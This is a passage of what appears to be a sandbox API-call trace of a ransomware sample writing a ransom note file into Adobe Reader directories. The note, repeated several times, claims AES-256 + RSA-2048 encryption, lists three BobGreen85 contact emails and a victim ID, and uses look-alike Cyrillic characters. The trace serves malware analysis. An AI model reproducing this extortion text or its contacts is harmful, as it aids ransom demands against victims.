r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0065.715] WriteFile (in: hFile=0x1dc, lpBuffer=0x2867358*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2867358*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0065.716] CloseHandle (hObject=0x1dc) returned 1 [0065.716] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\fra\\bg85_info.rtf")) returned 0xffffffff [0065.717] GetLastError () returned 0x2 [0065.717] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\fra\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0065.717] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0065.717] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0065.718] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s 